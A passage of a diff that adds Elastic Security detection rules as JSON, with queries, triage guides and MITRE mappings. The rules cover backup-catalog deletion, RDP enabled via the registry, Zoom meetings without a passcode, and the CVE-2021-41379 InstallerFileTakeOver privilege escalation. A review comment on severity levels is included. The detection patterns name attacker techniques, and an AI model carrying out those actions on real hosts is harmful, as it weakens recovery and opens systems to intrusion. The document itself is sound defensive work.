"keyword" + } + ], + "risk_score": 21, + "rule_id": "581add16-df76-42bb-af8e-c979bfb39a59", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more 
details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + }, + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "581add16-df76-42bb-af8e-c979bfb39a59_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_110.json b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_110.json new file mode 100644 index 00000000000..c1a64b88f3d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_110.json 
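Review bot: The `"risk_score": 21` / `"severity": "low"` pair does not match the rule's own guidance, which states the activity is "unlikely to be legitimate" and recommends isolating the host; the query is also narrow (wbadmin.exe by name or original file name, plus both the `delete` and `catalog` tokens), so false positives should be rare and a medium tier seems more defensible, or the false-positive section should explain why low was chosen. Separately, the `logs-system.security*` input presumably carries no `process.pe.original_file_name` (the `?` prefix already tolerates its absence), so a renamed wbadmin.exe would only be caught from endpoint or Sysmon data; that limitation is worth one sentence in `setup`, which currently only discusses `event.ingested`.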
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies registry write modifications to enable Remote Desktop Protocol (RDP) access. This could be indicative of adversary lateral movement preparation.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "RDP Enabled via Registry", + "note": "## Triage and analysis\n\n### Investigating RDP Enabled via Registry\n\nMicrosoft Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol that enables remote connections to other computers, typically over TCP port 3389.\n\nAttackers can use RDP to conduct their actions interactively. Ransomware operators frequently use RDP to access victim servers, often using privileged accounts.\n\nThis rule detects modification of the fDenyTSConnections registry key to the value `0`, which specifies that remote desktop connections are enabled. Attackers can abuse remote registry, use psexec, etc., to enable RDP and move laterally.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense to enable RDP to this host, given its role in the environment.\n- Check if the host is directly exposed to the internet.\n- Check whether privileged accounts accessed the host shortly after the modification.\n- Review network events within a short timespan of this alert for incoming RDP connection attempts.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Check whether the user should be performing this kind of activity, whether they are aware of it, whether RDP should be open, and whether the action exposes the environment to unnecessary risks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If RDP is needed, make sure to secure it using firewall rules:\n - Allowlist RDP traffic to specific trusted hosts.\n - Restrict RDP logins to authorized non-administrator accounts, where possible.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and \n event.type in (\"creation\", \"change\") and\n registry.path : \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Terminal Server\\\\fDenyTSConnections\" and\n registry.data.strings : (\"0\", \"0x00000000\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\SystemPropertiesRemote.exe\", \n 
\"?:\\\\Windows\\\\System32\\\\SystemPropertiesComputerName.exe\", \n \"?:\\\\Windows\\\\System32\\\\SystemPropertiesAdvanced.exe\", \n \"?:\\\\Windows\\\\System32\\\\SystemSettingsAdminFlows.exe\", \n \"?:\\\\Windows\\\\WinSxS\\\\*\\\\TiWorker.exe\", \n \"?:\\\\Windows\\\\system32\\\\svchost.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": 
"https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.001", + "name": "Remote Desktop Protocol", + "reference": "https://attack.mitre.org/techniques/T1021/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_111.json b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_111.json new file mode 100644 index 00000000000..a94bcd8c4be --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_111.json 
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies registry write modifications to enable Remote Desktop Protocol (RDP) access. This could be indicative of adversary lateral movement preparation.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "RDP Enabled via Registry", + "note": "## Triage and analysis\n\n### Investigating RDP Enabled via Registry\n\nMicrosoft Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol that enables remote connections to other computers, typically over TCP port 3389.\n\nAttackers can use RDP to conduct their actions interactively. Ransomware operators frequently use RDP to access victim servers, often using privileged accounts.\n\nThis rule detects modification of the fDenyTSConnections registry key to the value `0`, which specifies that remote desktop connections are enabled. Attackers can abuse remote registry, use psexec, etc., to enable RDP and move laterally.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense to enable RDP to this host, given its role in the environment.\n- Check if the host is directly exposed to the internet.\n- Check whether privileged accounts accessed the host shortly after the modification.\n- Review network events within a short timespan of this alert for incoming RDP connection attempts.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Check whether the user should be performing this kind of activity, whether they are aware of it, whether RDP should be open, and whether the action exposes the environment to unnecessary risks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If RDP is needed, make sure to secure it using firewall rules:\n - Allowlist RDP traffic to specific trusted hosts.\n - Restrict RDP logins to authorized non-administrator accounts, where possible.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and \n event.type in (\"creation\", \"change\") and\n registry.path : \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Terminal Server\\\\fDenyTSConnections\" and\n registry.data.strings : (\"0\", \"0x00000000\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\SystemPropertiesRemote.exe\", \n 
\"?:\\\\Windows\\\\System32\\\\SystemPropertiesComputerName.exe\", \n \"?:\\\\Windows\\\\System32\\\\SystemPropertiesAdvanced.exe\", \n \"?:\\\\Windows\\\\System32\\\\SystemSettingsAdminFlows.exe\", \n \"?:\\\\Windows\\\\WinSxS\\\\*\\\\TiWorker.exe\", \n \"?:\\\\Windows\\\\system32\\\\svchost.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": 
"https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.001", + "name": "Remote Desktop Protocol", + "reference": "https://attack.mitre.org/techniques/T1021/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_103.json b/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_103.json new file mode 100644 index 00000000000..474d90a8e9e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_103.json 
@@ -0,0 +1,77 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies Zoom meetings that are created without a passcode. Meetings without a passcode are susceptible to Zoombombing. Zoombombing is carried out by taking advantage of Zoom sessions that are not protected with a passcode. Zoombombing refers to the unwanted, disruptive intrusion, generally by Internet trolls and hackers, into a video conference call. In a typical Zoombombing incident, a teleconferencing session is hijacked by the insertion of material that is lewd, obscene, racist, or antisemitic in nature, typically resulting of the shutdown of the session.", + "index": [ + "filebeat-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Zoom Meeting with no Passcode", + "query": "event.type:creation and event.module:zoom and event.dataset:zoom.webhook and\n event.action:meeting.created and not zoom.meeting.password:*\n", + "references": [ + "https://blog.zoom.us/a-message-to-our-users/", + "https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "zoom.meeting.password", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "58ac2aa5-6718-427c-a845-5f3ac5af00ba", + "setup": "## Setup\n\nThe Zoom Filebeat module or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Data Source: Zoom", + "Use Case: Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": 
"Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "58ac2aa5-6718-427c-a845-5f3ac5af00ba_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_110.json b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_110.json new file mode 100644 index 00000000000..580a12e7113 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_110.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a potential exploitation of InstallerTakeOver (CVE-2021-41379) default PoC execution. Successful exploitation allows an unprivileged user to escalate privileges to SYSTEM.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via InstallerFileTakeOver", + "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name : \"System\" and\n (\n (process.name : \"elevation_service.exe\" and\n not process.pe.original_file_name == \"elevation_service.exe\") or\n \n (process.name : \"elevation_service.exe\" and\n not process.code_signature.trusted == true) or\n\n (process.parent.name : \"elevation_service.exe\" and\n process.name : (\"rundll32.exe\", \"cmd.exe\", \"powershell.exe\"))\n ) and\n not\n (\n process.name : \"elevation_service.exe\" and process.code_signature.trusted == true and\n process.pe.original_file_name == null\n )\n", + "references": [ + "https://github.com/klinix5/InstallerFileTakeOver" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "58c6d58b-a0d3-412d-b3b8-0981a9400607", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will 
not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "58c6d58b-a0d3-412d-b3b8-0981a9400607_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_111.json b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_111.json new file mode 100644 index 00000000000..bc85b55087e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_111.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a potential exploitation of InstallerTakeOver (CVE-2021-41379) default PoC execution. Successful exploitation allows an unprivileged user to escalate privileges to SYSTEM.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via InstallerFileTakeOver", + "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name : \"System\" and\n (\n (process.name : \"elevation_service.exe\" and\n not process.pe.original_file_name == \"elevation_service.exe\") or\n \n (process.name : \"elevation_service.exe\" and\n not process.code_signature.trusted == true) or\n\n (process.parent.name : \"elevation_service.exe\" and\n process.name : (\"rundll32.exe\", \"cmd.exe\", \"powershell.exe\"))\n ) and\n not\n (\n process.name : \"elevation_service.exe\" and process.code_signature.trusted == true and\n process.pe.original_file_name == null\n )\n", + "references": [ + "https://github.com/klinix5/InstallerFileTakeOver" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "58c6d58b-a0d3-412d-b3b8-0981a9400607", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will 
not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "58c6d58b-a0d3-412d-b3b8-0981a9400607_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_103.json b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_103.json new file mode 100644 index 00000000000..eb1228a0759 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_103.json 
